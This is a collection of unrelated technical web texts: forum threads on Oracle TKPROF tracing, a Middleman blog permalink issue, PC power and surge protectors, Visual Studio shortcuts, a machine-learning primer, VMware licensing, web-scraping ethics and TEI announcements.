to all programmers, but not to all programmer that work on the same project. HUH?! I DON'T GET IT! It's just a tool. Any competent programmer should be able to utilise their tools appropriately, and if they feel that a different IDE is more suitable for how they do development, then they should do so. @Arafangion thats half an answer. why do people here think that using a unique tool is bad(the first part you didn't answer), while people here think that using a unique tool is fine(that is the second part you did answer).
STACK_EXCHANGE
One of our applications is running slowly and we believe that it is the application causing it , not the database. I have just traced and TKPROF'd a session in one of our Oracle Databases to establish how the code is being interpreted, whether or not it is using its indexes, how long it is taking to process. The results seem fine to me, hardly any cpu/elapsed time, explain plan shows that the system is making use of indexes etc. I do however have some queries regarding my output : Does anybody know :- Why some statements are parsed numerous amounts of times. Why statements need to be executed a number of times to pull out the desired data. Can you also please tell me what the difference between a recursive and non-recursive statement is. Thanks in advance 05-03-2001, 06:01 AM Dear Suresh, 3rd May 2001 14:10 hrs chennai This is for Recursive and Nonrecursive calls a link. Reg the number of calls why the reasons are follows. While you issue a select ,update,delete or insert the objects information would not been available in Data Dictionary cache.So recursive call will happen. And i think you have to seen that in TKPROF file it would have given the overall cumulative of recurisve and non-recursive total at the bottom for ALL STATEMENTS executed from the start of the session and till you end the tracing to take a output using TKPROF. So you should not think that the PARSES,EXECUTE,FETCH is HIGH for a single statement. At the start of the TKPROF file you could have seen the each statement wise it would have been stated the number of PARSES,EXECUTE,FETCH. 05-03-2001, 09:26 AM Thankyou for your reply, I now understand recursive/non recursive - however : When TKPROFING, I set the argument sys=n so that system sql statement statisticts would not be shown. I can still see that some statements were parsed anumber of times=, 9/10 times - do you know why ? also - how can I get the system to use array fetching as I have noticed that a fetch is issued for each row retrieved. Thanks in advance 05-03-2001, 09:59 AM One way that I have seen this happen before was when there was code that was written where queries were executed within some sort of LOOP structure. The query would be built, parsed, executed and fetched within the LOOP. A value would be retrieved and then the next iteration in the loop would occur where the query would get rebuilt, parsed, executed and getched. To resolve that I changed the code to use dynamic SQL, moved the parse call outside of the loop and then used bind variables to change the query values within the loop so that all that was needed was to re-execute the query and fetch the new rows. I hope that made sense. I have no idea if this applies to what you are seeing because it's a little hard to determine without understanding your application or seeing your queries. But, you asked how this could happen and this is one cause that I have seen. :) 05-03-2001, 10:35 AM sys=no run as user sys Hi, 3rd May 2001 19:57 hrs chennai i understand your 1 doubt try to execute the same query for >alter session set sql_trace=true >select * from emp; >alter session set sql_trace=false Now look each time at the output file and tell me what happened for the number of parses ?for each time to execute the tkprof execute a standard SQL statement as mentioned above but first time let it be from a new table and other 2 times the same query. Note:SYS=NO==>Ignore recursive SQL ststements run as user SYS. Let me know what you understood on the above results.? now you can find at last the parse,fetch,execute would have become 0,0,0 for recursive statements.
OPCFW_CODE
blog.permalink get confused with the {title} As far as I understand the blog.permalink should allow to build the final URL in whichever desired format, also using frontmatter properties. However, no matter whether I use the {title} or :title, the final permalink title always correspond to the filename. Let's say a default source filename format as %Y-%m-%d-something ... the title in this circumstance is the filename and not the value in the front-matter. It would be good renaming this as "filename", leaving the title (which it is likely to be used in the frontmatter) for what the real word mean implies. Just to add something else. According to the link below, a slug should be already produced when the :title is used. http://www.rubydoc.info/github/middleman/middleman-blog/Middleman%2FBlog%2FBlogArticle%3Aslug Hiya, Thanks for sending in the your report. To further aid in finding the issue can you please supply either a full repository that mimics your issue. Or at least a GIST of the config.rb file and an explanation on what steps to take to replicate this Thank you. Hi Ian, Below the config.rb for my project. activate :i18n, :mount_at_root => false, :templates_dir => "content", :locales => [:en, :it] activate :directory_indexes activate :autoprefixer do |config| config.browsers = ['last 2 versions', 'Explorer >= 9'] end set :markdown, auto_ids: false set :markdown_engine, :kramdown activate :blog do |blog| blog.name = "blog"; blog.prefix = I18n.locale.to_s+'/blog' blog.permalink = "{category}/:permalink" blog.layout = "Blog-inner" blog.summary_separator = /(READMORE)/ blog.summary_length = 390 blog.generate_day_pages = false blog.generate_month_pages = false blog.generate_year_pages = false # Enable pagination blog.paginate = true blog.per_page = 6 blog.page_link = I18n.t(:blogPageLink) + "-{num}"# end As for the repository, not sure I can share that one that easily, but have a look at the screenshot below that shows the structure of my blog posts: And the FrontMatter of one of them --- date: 2015-03-03 cssLayout: blog category: test tags: test title: "Keep going with the development" permalink: "ciao" description: "Let's see whether this works" keywords: 'Vivere a Manchester, Trasferirsi a Manchester' author: Andrea Moro heading: Vivere a ... Londra SearchFromSummary: true --- Now, the logic would have suggested a blog.permalink = "{category}/:title" would have resulted in the title from the FrontMatter to be used to construct the permalink. However, the title in the case of this project always equal to the "filename" of the blog post without the date. In the case of the frontmatter above, that is "keepgoing". Hence my suggestion to rename the property / behaviour of the title into filename. Hope this makes more sense, or you can spot something wrong in what I did. Please note that I added the permalink data in the FrontMatter only after I realised I couldn't get this done any better. Thanks Can you also add the versions of Middleman and Middleman Blog please. Ok getting to the bottom of this: Title - is the correct name (and we wont be changing this) - for instance if you use the CLI command to create an article then you reference the title in this command and its applied to the filename for uniqueness : middleman article TITLE If the Title appears in the filename then its takes precedence over the frontmatter as is applied to the metadata of the article, now for your scenario you want config : activate :blog do | blog | blog.sources = ":category/:year-:month-:day.html" blog.permalink = ":category/{title}.html" end Post frontmatter : --- title : "Newer Article 1" date : 2011-01-01 --- Then the title becomes the slug for the permalink. This example means you need to need to rename your files If you want an extra front matter for say a title in the page then create something like heading : "New custom page heading" And use this in the article loop And also stated in the Forum, consider the slug : custom-url-for-each-post This way you get full manipulation of the URL you want per post, better for SEO also. Hi Ian, Thanks for looking into this, but that "permalink" configurations were already explored, and that's the reason I opened this issue. Please have a look at the new screenshot. As you can see, the title in the frontmatter is not used to build the permalink, and - assuming I understand you correctly - the filename "title" is not the same of the frontmatter title. And I don't understand in which other way a title could not appear in the filename itself. Can you please advice?
GITHUB_ARCHIVE
PC hardware--CPU & Motherboard & RAM/surge protector I wasn't sure what category this best fits, but here goes: When I'm not using my PC overnight or for long periods of time, is it best to shut off my surge protector(for my PC/monitor/printer),or doesn't it matter? Thanks, Robert It depends on what your goal is, as to whether this is a good or bad idea. In terms of harming anything, there should be no risk, although the switch on the surge protector may wear out depending on how frequently it is actuated (it is a mechanical device, just like a light switch, so it can wear out with use - this is usually never a consideration for a surge protector or something else that's rarely switched, but if you were doing this daily it may eventually become noticeable (we're likely talking over the course of many years)). With the computer powered off, but plugged in, it will draw very little power (in many cases under 5W, however if the system continues to provide power to USB ports while off (a feature on some newer machines), using the machine to charge devices or similar will increase that power consumption, and is likely less efficient than using a stand-alone charger). It draws some power to maintain "standby" (this isn't the same as putting the computer into stand-by from within Windows), which is what allows it to turn on when buttons are pressed, and it also draws some power to maintain the real-time clock. With power disconnected from the wall, the machine will rely on an internal button cell battery. Generally those batteries last for years, however if the battery were to fail the machine would not have an accurate clock setting, and the CMOS will also clear. This will not damage anything, but it will throw an error on start-up (it will not prevent the machine from working in any way), and once the battery is replaced the system can then rely on it again. These batteries are very easy and cheap to find, and generally easy to replace. Of course, if/when the battery fails and the machine is plugged into AC power, you will likely still get a message about the dead battery, but as long as the AC power supply is maintained, the clock/CMOS will not be reset. Think of this battery as similar to the 9V that some alarm clocks use to maintain their time when unplugged or in the event of a power outage. The other devices, however, there is likely no downside to having the AC power cut periodically. The exception here would be if your printer is elaborate/complex enough to have a clock or other functionality, but more simple desktop printers likely do not. The same goes for your monitor. Cutting off the AC power, however, will reduce power consumption from these devices when they are not in use. Especially if the printer does not have a power saving or "idle" mode. At most we're probably talking 20-30W, but if your goal is to reduce power consumption that's still something, and it's a very simple thing to do. There is a more convenient option than manually switching the power strip/surge protector though - there are a variety of surge protectors that will automatically disconnect their outlets when a "control" device is detected as off. You could plug the computer itself into that "control" outlet, which would ensure that it gets 24x7 AC power for standby, its internal clock, and (if this is a feature your computer has) USB charging, but the outlets for the monitor, printer, etc would be disconnected when the computer was not powered on, saving power. These kinds of surge protectors are usually marketed as "Green" or "Environmental" models, and aren't entirely uncommon, or expensive. Here is an example device: You can also find things like these at hardware stores and some electronics or department stores. For extended periods of non-use (e.g. you're going on a two week vacation), I would generally suggest physically unplugging the computer (and other devices, like your TV) from the outlet. This not only will reduce power consumption while you're away, but can afford some protection from a power surge or other event for disconnected devices. If you have any further questions, feel free to ask.
OPCFW_CODE
Visual Studio Shortcuts and Add on Tools This post from Premier Developer consultant Crystal Tenn walks you through customizing Visual Studio to work better for you and your organization. I like tools that make my development faster and more organized. The small amount of time it takes to invest in installing and learning these tools pays off in the long run! I have listed out the shortcuts that I use in my Visual Studio and how to change your settings if you want to adopt some of my shortcuts or make up your own easy to remember ones. You can share settings across a team so that everyone is more productive and in sync. I like to change my new classes so that by default they are public, instructions are below. Also, I use add-ons to help check my spelling, so it is easy for others to find my work (hard for others to find my class if I spell it wrong) and I have listed a couple of options in this article. I did not go into this topic here as it is lengthy, but I also do recommend using ReSharper which has many tools to help you write code faster and more effectively! *As a note, all screenshots are taken with Visual Studio 2017. How to get to edit Visual Studio Shortcuts: - Click on Tools > Options - Under Environment, go to Keyboard. The highlighted section “Show commands containing:” corresponds to the “VS Mapping column” in the table that you will see next. If you press shortcut keys, you can assign a new shortcut to whichever command is selected. You can type in the shortcut keys to find out if it is used by anything currently by checking the box below that is greyed out in the screenshot that reads “Shortcut currently used by”, for example if you need to find the name of a shortcut you use, and you are not sure what it is called. |How to remember it: |Project / Files / References |Add a new class |Ctrl + N, Ctrl + C |N for New and C for Class |Add new Project |Ctrl + N, Ctrl + P |N for New and P for Project |Add existing Project |Ctrl + N, Ctrl + E |N for New and E for Existing |Set current project as startup |Ctrl + S, Ctrl + P |S Set as Startup and P and Project |Add Reference to selected project |Ctrl + A, Ctrl + R |A for Add and R for Reference |Comment out code |Ctrl + K, Ctrl + C |Comment in code |Ctrl + K, Ctrl + U |Collapse all methods |Ctrl + M, Ctrl + O |Collapse all code |Ctrl + M, Ctrl + L |Uncollapse all code |Ctrl + M, Ctrl + P |Ctrl + R, Ctrl + R |Fix all code alignment |Ctrl + K, Ctrl + D |/// the line above what you want to comment, then hit enter |Go to Declaration |Go to Implementation |Ctrl + F12 |ReSharper VS config default |Ctrl + T |Go to Solution Explorer |Ctrl + S, Ctrl + E |S for Solution and E for Explorer |Go to Team Explorer |Ctrl + T, Ctrl + E |T for Team and E for Explorer |Go to Test Explorer |Ctrl + U, Ctrl + T |U for Unit and T for Tests |Ctrl + – |Ctrl + Shift + – How to export Visual Studio Shortcuts: - Click Tools > Import and Export Settings …. - On the popup, choose Export selected environment settings and hit Next > - To choose only the keyboard settings, UNCHECK all settings, then go under options, go under environment, and then CHECK keyboard. How to import Visual Studio Shortcuts: - Go to the same menu from Tools > Import and Export Settings … - Choose Import selected environment settings then hit Next > - Select if you just want certain settings or all the settings, for Keyboard go to the same mapping as the screenshot above in the previous set of instructions. - Choose the.vssettings file you want to import and where you want it stored. - Hit Finish How to set new classes to be public by default: - Go to one of these locations, depending on which version of VS you own. - VS2015: C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\ItemTemplates\CSharp\Code\1033\Class - VS2017(RC): C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\Common7\IDE\ItemTemplates\CSharp\Code\1033\Class - Edit the template and add the public keyword before class. Add any other changes you would like to a default class or its usings. Code Commenting Tool: GhostDoc helps you with filling in as much of your comments as possible ahead of time so that you can go ahead and customize it a little bit more. It saves you time by putting in a default summary and all your parameters into plain English. *Note Pro/Enterprise come with free spell checking ! GhostDoc Community (free) for VS2017: https://marketplace.visualstudio.com/items?itemName=sergeb.GhostDoc GhostDoc Pro/Enterprise/Community for VS2015: https://submain.com/download/ghostdoc/pro/ Cost of Pro/Enterprise editions: https://submain.com/order.aspx Features for different editions: https://submain.com/products/ghostdoc.aspx#features 4-minute kick-starter tutorial: https://submain.com/ghostdoc/GettingStarted/ Spelling Check Tool: ReSpeller (free!) If you don’t get GhostDoc’s paid versions and you want free spelling tools you can get it from the folks at JetBrains who made ReSharper by downloading this:
OPCFW_CODE
Add ability to get global and command level variables from a yaml file? I worked on a tool that leverages codegangsta cli library. As part of that work I wrapped much the cli to add the capability to get values from a yaml files. One for the global parameters one for the command parameters. By default there would be a global file called .test.config.yml that global parameters could be pulled from. The name of the file could be configurable. The precedence would be if a value was specified on the command line it had the highest precedence, followed by and env variable, followed by a value in the yaml file. Below is a pseudo design as I'm just trying to get across the idea. For a command, add fields: cli.Command AllowFileInput string // allows the command to accept input from a file FileInputFlagName string // defaults to "load" For Flag we can add to the the following fields AllowFileInput // indicates that this flag value can be found in the file. The files I pulled from were from a yaml file We also have a version flag built into the file as well and when the file is loaded if the file doesn't meet a particular version it will error. There are a couple of problems where I can see this getting a little complicated like pulling generic values, it could be a tricky to map, I didn't support this as we didn't need anything like that. I suppose on a first stab we can exclude pull parameters like that. Would this be an interesting capability for me to create a pull request along those lines? It would take a little time as I'd need to rework what I have to the internal code and rework the tests of course. Just trying to give to something I've used. Hi @ChrisPRobinson, thanks for bringing this up! There was a little discussion around this in #235. I think this functionality would be very useful and would be open to a pull request introducing it. I think it would be nice to see it architected as add-on functionality if at all possible rather than changing the existing interface. A half-baked idea may be to introduce a subpackage that defines another set of flags that wraps the existing flags (and still satisfies the interface) but sets the default value based on a passed in configuration file. So that you could then do something like: config := cflag.NewProvider("somefile.yaml") myCommand.Flags = []cli.Flag{cflag.IntFlag{Name: "foo", Value: 123, ConfigProvider: config}} I think this would approach would be more flexible (support could be added for INI, JSON, etc.). Cool, I'm glad people are interested in this functionality. The approach you outlined is interesting, I hadn't exactly thought of that. I was attempting to make a pull request and I came up with something slightly different. Its totally not ready but here is what I had. I made a new interface called FlagApplyExtension. type FlagApplyExtension interface { ApplyContext(*FlagSetContext) } type FlagSetContext struct { set *flag.FlagSet inputSourceData InputSourceFlagProviderData } I also made two other interfaces as well type InputSourceFlagProvider interface { LoadFlag() Flag Data(c *Context) (InputSourceFlagProviderData, error) } type InputSourceFlagProviderData interface { IsFlagSpecified(name string) bool Int(name string) int Duration(name string) time.Duration Float64(name string) float64 Bool(name string) bool BoolT(name string) bool String(name string) string StringSlice(name string) []string IntSlice(name string) []int Generic(name string) interface{} } The idea was to have a different implementation for the sourceProvider. It can be ini, yaml, whatever. I made a providerData implementation that can handle a map. Then i wrote a yaml data source impl that would read the data in and be able to use map data impl. I tweaked the command execution ever so slightly to invoke the new interface if it existed otherwise to you use the other one. In the core it would only look at the InputSource if it wasn't nil, otherwise all the code stayed the same. I set the sourceProvider on the Command itself. From there it would flow down to the flags. You would only indicate if you wanted the flag to be read or not. Also I would inject an input flag as well that could be used. I was just trying things out this way. If I were to follow what you are describing I would also want to not have to specify for each flag the config provider, rather have that at the command level. I would need to implement something for that too. Perhaps this is too much detail, probably the best thing is to just nail down the api that we want people to use and work from there. Oh and I forgot to mention, I wanted the config file path to be parameterizable. In your example above you have to specify the file directly. I wanted one flag to be specified on the command itself. That would be the connection parameter. In my sample I would create a default "load" flag. This parameter is used to load. This also changes up how to initialize everything. You can get a cli.Context to get the flag value until they are all already parsed. One last note, the design I made doesn't fully work yet because of the fact that you want to be able to get some of the values that were already parsed to figure out where the yaml/configuration file is. There has to be a first pass that parses all the values. Then afterwards the config file is parsed and values are overridden if they are empty or default values. +1 +1 One issue that you've touched on is the precedence of different configuration sources (command line vs yaml file, etc). This gets pretty difficult to manage the more sources you add (e.g think of adding environment variables to your new flag objects). I'm working on a project that addresses that issue (it sounds very similar to your original project. Shameless plug: https://github.com/zpatrick/go-config), and I think a very flexible and useful feature side projects like ours could use is to be able to set flag values after parsing the in "context" object. There's an old feature request at: https://github.com/codegangsta/cli/pull/234 which tries to accomplish that. I don't see much movement on I though. I think adding that feature in this mr will make it much more valuable. It opens the door for arbitrary flag providers, not just the ini, yaml, etc that get built in this repository. @zpatrick Thanks for the link, I'll take a look at it. I'm working on a prototype that "gets things working" not that I want that pushed in, just as a starting point. One of the difficulties I'm having is getting the precedence working correctly, at least in the order I'm interested in. first specified args, then env vars, then yaml, then defaults. In the work I've done I think I have an idea on how I can make which value that is chosen a more composable operation. Might be able to get something out this weekend. But it won't be the real thing, just an initial cut to make for more discussion. I'd like to alter some of the internals if I can, I think this might open customizations a bit more. https://github.com/ChrisPRobinson/cli/pull/1 - Need to do more work to make something workable along the lines that @jszwedko was talking about, though putting this out there to view. The next work I do I'm going to take the cli.Context refactor I made and then make new flags in another package along the lines that was discussed above. I'm going to aim to make something a bit composable for how it gets the values. Another Prototype impl, tried to reduce the set of changes to core files- https://github.com/ChrisPRobinson/cli/pull/2/files Ok after a bunch of experimentation I've gone more of the way that @jszwedko suggested in the first place. I forgot about the power of embedding a struct in an existing one. It will also allow others to be able to create other input sources other than yaml. Defining the flags seems ok. https://github.com/ChrisPRobinson/cli/pull/3 Probably easiest way to see how people would use it is to look at the tests https://github.com/ChrisPRobinson/cli/pull/3/files#diff-bbc8ba4cb51df0fc39d93d43e810f54f I welcome any comments. I'll just start working on implementing the rest of the functionality and adding tests as well. pull request opened that can add this functionality. Still need to do work to get this to build correctly. https://github.com/codegangsta/cli/pull/306 Never actually closed this issue out. Thank you so much for the implementation @ChrisPRobinson !
GITHUB_ARCHIVE
There is a revolution happening right now in computing. Computers are becoming capable of many tasks that were previously considered only achievable by humans. As an example, back around 2011, if you asked an expert if a computer could tell the difference between a picture of a cat and a dog, they would probably tell you that it’s a hard problem. They are both furry creatures of varying colors that can have pictures taken from so many angles and in so many ways. How could a computer possibly figure this out? Today, it’s safe to say that this problem has been solved. And a whole lot of other challenging problems have been solved along with it. The driving force behind these advancements is a field called machine learning. Machine learning is when a computer learns by example instead of by strict rules that have been programmed. Specifically, there are algorithms called neural networks, deep neural networks, or deep learning that have been making huge advancements in the field. Neural networks borrow some ideas from biology in an effort to mimic the way a human brain works. Deep neural networks and deep learning build on the basic neural network algorithms in a way that lets them learn higher-level concepts. Let’s look at one example called the ImageNet challenge. ImageNet is a collection of images that are all tagged with a word describing what is in the image. Every year there is a challenge where teams compete to have their computer programs recognize these images. In 2011, the error rate of the best program was about 26%. The way they score this is that out of many images, the computer has to guess what those images are from 1000 categories – various things like different dog breeds, plants and buildings. The computer has 5 guesses per image and if it can’t guess correctly, it is considered to have failed that image. In 2012, a deep learning approach was used for the first time to win the challenge. Since then, the error rate has been almost cut in half every year. At the time of this writing, the error rate is 3.08%. This looks even more impressive when you look at the human score for this challenge. One person tried to do this challenge himself, so there would be a reference for human performance. He got 5.1% error. So it’s safe to say that computers are pretty good at image recognition now, and this is something they have been historically bad at. Before getting to other examples and applications of neural nets, I’d like to explain a little about how the image recognition works. Machine learning differs from other ways of programming a computer because it learns from examples. Usually, when you program a computer, you give it exact rules to follow. As an example, if you want to make software to recognize an image of a tree, you could write a program that says, “If the image is green on top and brown on the bottom, then it’s a tree.” That fails pretty quickly though with different kinds of trees and different lighting, and of course, in the fall when leaves turn red. You can solve that by writing more rules about what makes a tree a tree, but you quickly realize you’re fighting a losing battle. The machine learning approach is to show a computer program images of thousands or millions of trees, and have it learn the patterns in the images automatically based on patterns it finds. More recently, many of the techniques that have been gaining traction are called “deep learning.” Deep learning is machine learning, but instead of looking for simple patterns, it is able to look for patterns-of-patterns, or patterns-of-patterns-of-patterns, and so on. By doing that, the deep learning system can start to understand higher-level concepts. In the case of image recognition, it will start by recognizing simple patterns like edges. From there, it will look for patterns-of-patterns – things that you can make from the simple edges, like corners or circles. From there, it can start recognizing higher-level concepts, like if it sees a car, maybe it can start to put together the headlights or wheels from those edges and circles. And then finally, it can put all the patterns that make up car pieces into a whole car. Each one of these stages of finding patterns is called a “layer” of the neural network and it’s the fact that these systems use many layers that is the reason this is called “deep.” The “learning” part of “deep learning” is because all of these patterns that the computer looks for are learned from examples, not from manually designed rules. Image recognition is just one example of how new machine learning techniques are changing what computers can do. Machine learning is generally good at problems where computers need to understand and/or predict real-world data that is not exact. Other examples are things like speech recognition and understanding natural language. There are limitless applications of this technology and every industry on the planet will be affected by it if it hasn’t been already. In some applications, it will be easy to tell that machine learning is being used. Voice recognition on your phone primarily uses machine learning. For other applications, it will be less obvious that machine learning is involved. Better image recognition can help in the process of understanding medical images. There are companies working on medical diagnosis using the same image recognition technologies that are winning the ImageNet challenge. My work uses deep learning to recognize images of text and translate them between different languages in real-time on a phone It shows that we can now take these neural networks and run them on phones, which are much less powerful than your typical desktop or cloud computers. Even though machine learning is the underlying technology, the user of the software doesn’t necessarily know that. To them, it is an app that they can use to break down language barriers. Convolutional Neural Network (CNN): This type of neural network is very good at image recognition. The ImageNet challenge winners tend to use variations of this algorithm. Long short term memory (LSTM): This type of neural network is good at understanding or predicting sequences of data. Things like speech or natural language will often be handled by LSTMs. Deep learning / deep neural networks: Usually when people talk about “deep” learning, they are talking about CNNs or LSTMs. These networks recognize patterns and then feed those patterns into another stage of the neural network that then recognizes patterns of patterns. This process can be repeated many times to learn higher-level concepts. In the past (80s / 90s), neural nets were hyped up and then didn’t live up to the hype. This time things are different. Even if progress in the field were to stop this instant, the progress we have seen so far would still be quite significant and game changing for many industries. But it’s not stopping. Every month exciting new research is released that pushes the boundaries and has people rethinking what was considered cutting edge last month. The initial spark for this recent progress came primarily from computers getting faster and from access to more data. Now we are also seeing so much research effort directed at this problem, that there are many significant algorithmic improvements happening. So let’s look at each of these 3 things – performance, data, and algorithms: 1. Computer performance improvements overall have slowed a bit in recent years, but there are companies making hardware specifically designed for neural networks. So performance will continue to improve for neural networks, allowing for more capable machine learning systems and allowing complex applications to run on lower power processors like those found in phones. 2. More and more things are going online around the world and with that comes more data. Data quantity, quality, and diversity will continue to improve. This data can then be used to train machine learning systems. 3. More attention is being paid to the field of machine learning, and with that, more research and investment is happening in companies in the space. There will continue to be algorithmic progress. Progress in machine learning is not slowing down. There are applications of this technology that will deeply affect every industry. This will be a revolution as big as, or bigger than, personal computers, the internet, or mobile phones. Machine learning is the next underlying technology.
OPCFW_CODE
Easy just got easier Cloud computing offers undisputed benefits in terms of agility and cost-effectiveness, and VMware offers unparalleled ability to automate and manage workload across different cloud infrastructures. VMware’s vCloud Suite brings together VMware’s vSphere hypervisor with vRealize Suite, their multi-vendor hybrid cloud management platform. With vCloud suite, you can easily build and manage both vSphere-based private clouds as well as multi-vendor hybrid clouds. And now, VMware has made the licensing administration for both vCloud Suite and and vRealize Suite 7.0 easier as well. VMware recently announced a newer licensing model for the vCloud Suite and vRealize Suite 7.0. This comes in a new form called a Portable License Unit (PLU), instead of per CPU and per OSI licensing for volume license customers. For each vRealize Suite license bought, you can either have one vSphere CPU or 15 OSIs in a non-VMware cloud (AWS, vCloud Air, Physical, etc.). The VMware vCloud Suite is simply an extension of the vRealize Suite by adding vSphere Enterprise Plus to the total license package. For complete details on the new PLU, check out VMware’s recent white paper on this topic. Besides the licensing questions we receive at WWT, as a leader in the Cisco and VMware space, we are often asked how we can integrate the two solutions together to provide lifecycle management, performance monitoring and analytics from VMware’s Cloud Management Platform (CMP) solution. Here’s a quick list of some of the Cisco capabilities delivered from each of the major VMware products in the vRealize Suite. VMware vRealize Automation - Provides physical server provisioning to Cisco UCS hardware using UCS Manager - Using the Cisco UCS plug-in for vRealize Orchestrator, customers gain more administrative control by having blueprints that can manage BIOS settings of blades and manipulate service profiles in UCSM. - Integrates with ACI core technology and can embrace NSX on top of ACI - Creates orchestrator workflows to manage switches, routers and firewalls and then publishes them as self-service catalog items in vRA VMware vRealize Log Insight - VMware vRealize Log Insight is a log analytics tool that supports over 2.5TB of log data per day. Customers can quickly troubleshoot a problem by looking at the compute, network, storage, virtualization and application layers all at once. - Did you know that if you are an existing vCenter customer, you now get a free vRLI 25 OSI license with each vCenter Standard license? That means your IT organization can start using this tool in the data center today. 25 OSIs is more than enough to cover vCS and 10 ESXi hosts while still allowing room for VMs, network switches, etc. - Cisco UCS Content Pack for Log Insight - Cisco Nexus Content Pack for Log Insight - Cisco ASA Content Pack for Log Insight - VCE Vision for Log Insight VMware vRealize Operations - Performance monitoring, capacity planning and optimization built for the Enterprise all in one tool. VMware vRealize Operations can integrate with a variety of third-party products, including public clouds like VMware vCloud Air and AWS. - Cisco UCS Management Pack from Blue Medora - Cisco Nexus Management Pack from Blue Medora - FlexPod Management Pack from Blue Medora - VCE Vision Management Pack
OPCFW_CODE
Someone recently approached me with a question about considerations for a team who was thinking about scraping a commercial web site for data that was behind a paywall. The development team was thinking in terms of something being technically feasible, but not necessarily about the broader implications. I wrote back and figured I’d put my thoughts up here. Standard disclaimer: I am not a lawyer. - Legal: Most sources of data public clear terms & conditions about its access that prohibits web scraping. If it’s commercial data, they see this as a business threat, because they often up-sell for programmatic access to data. Unless it’s explicitly allowed (or not addressed, if you’re comfortable in a grey area), you’re asking for legal trouble. I worked for a company that protected data like this. They have a big legal dept for a reason. - Detection: If someone doesn’t want you to scrape them, chances are they have ways to detect if you’re scraping them. Request logs and monitoring give spikes away. Without disguise (which is borderline unethical) & adherence to a lot of politeness (which most scrapers would take forever if they did), most sites will be able to tell that someone is scraping them, and then figure out who. - Complexity: You might find that your target site actively obfuscates (e.g. by moving HTML elements around, renaming things, etc.) to throw off web scrapers, which often rely on consistent output in order to do their job. They also may give you fake data once you’re detected to be scraping. - Blocking / Banning: Even if someone doesn’t sue you, they might blanket block your entire organization, meaning you might lose the legit access to data that you have because IPs, subnets, and other machines get banned. And if they know the org doing it, they may take additional steps to ban that org’s IPs as well as a retaliatory measure. Here’s an article that warns businesses about the dangers of web scraping, in case you need to help them see it how the target site might see it: https://blog.radware.com/security/2016/03/good-bad-and-ugly-web-scraping/ Here’s a nice succinct idea of ethics in web scraping: https://towardsdatascience.com/ethics-in-web-scraping-b96b18136f01 The difference is that your target site likely doesn’t fall into the “ethical site owner” category in this article, as they are going to protect the data as a source of their IP, and that data is not something they’d consider part of the open web (especially if it’s behind a login screen or subscription or portal of any kind.) In short, I would push back strongly on the practice unless someone can show you that: - It is explicitly allowed via your subscription (e.g. you have paid access to the data) - It is not disallowed under the terms & conditions (just paying for it doesn’t mean you can use it however you want) - It is not available as an up-sell on the subscription you already have - (Ideally) A client’s legal team has signed off on the activity. - Your team has a set of guiding principles in place similar to the “ethical data scraping” article above, and plans to adhere to them. - Your company’s client team is comfortable with the level of risk to the account relationship. I hope this helps if you’re considering your options here – wishing you happy, and ethical, scraping!
OPCFW_CODE
The 2.0.1 release of TEI P5 is a minor release fixing a number of bugs pointed out with the 2.0.0 release. The 2.0.0 release of TEI P5 was a major new release of the TEI P5 Guidelines, which introduces some significant new material as well as implementing an unusually large set of other changes and error corrections. Since the last release in March 2011, members of the TEI community have proposed over 60 feature requests and reported about the same number of errors; dealing with these has kept the TEI Council busy, and most of these tickets have now been closed. See further the release notes http://www.tei-c.org/release/doc/tei-p5-doc/readme-2.0.1.html. This is a major new release of the P5 Guidelines, which introduces some significant new material as well as implementing an unusually large set of other changes and error corrections. Since the last release in March 2011, members of the TEI community have proposed over 60 feature requests and reported about the same number of errors; dealing with these has kept the TEI Council busy, and most of these tickets have now been closed. See further the release notes at http://www.tei-c.org/release/doc/tei-p5-doc/readme-2.0.html All, The TEI Projects page at http://www.tei-c.org/Activities/Projects/index.xml has been gathering entries for quite a few years, and not surprisingly some of the information in the entries is obsolete or out of date. TEI Council has discussed migrating the information here to a more user-friendly database-like interface, but that may not happen for a while. In the meantime, I have just gone through the existing entries and fixed broken links. I am sure that other information (contact email, etc.) needs updating as well. If you are responsible for a project listed on that page and want to make any changes, could you please email the details to me? Also, you can submit new projects here: http://www.tei-c.org/Activities/Projects/newform.html Four projects on the list seem to be entirely missing from the Web. If anyone can provide me with working links to them, I will update; otherwise I will remove them from this list in a week or so: The Anglo-Saxon Poetry Project http://www.tei-c.org/Activities/Projects/an01.xml The Cursus Project http://www.tei-c.org/Activities/Projects/cu01.xml Project Lorelei http://www.tei-c.org/Activities/Projects/lo01.xml The Sternberg Project http://www.tei-c.org/Activities/Projects/st01.xml Thanks for assistance, David Sewell, email@example.com TEI webmaster TEI Community Initiative Grants Proposals Due 15 December 2011 Total Call: $4,000 The TEI Board is delighted to announce a call for Community Initiative Grants. Proposed projects proposed should support and promote the goals of the TEI and should be carried out within one year of the date of the award. Applications will be adjudicated according to the following criteria: * excellence of the proposal; * contribution of the activity to the promotion and development of the TEI; * track record of individuals or group proposing the activity; * deliverables which are realistic and can be accomplished within the budget and time period proposed. Although there is no upper amount for any individual proposal, applicants should bear in mind that the total amount for this grant call is $4,000. Proposals should be no longer than three pages (ca. 750 words) and should contain the following information: 1. Name and contact details of proposer 2. Name of organization (if the proposal is being submitted on behalf of a TEI SIG or other organistion) 3. Narrative addressing the criteria above. 4. Amount requested. Please indicate if it would be possible to carry out the activity with less funding, and if so, how that would change the nature of the proposal. 5. Date for final report Please send submissions to Susan Schreibman by 15 December 2011 -- Susan Schreibman, PhD Long Room Hub Senior Lecturer in Digital Humanities School of English Trinity College Dublin Dublin 2, Ireland email: firstname.lastname@example.org phone: +353 1 896 3694 fax: +353 1 671 7114 check out the new MPhil in Digital Humanities at TCD http://www.tcd.ie/English/postgraduate/digital-humanities/
OPCFW_CODE
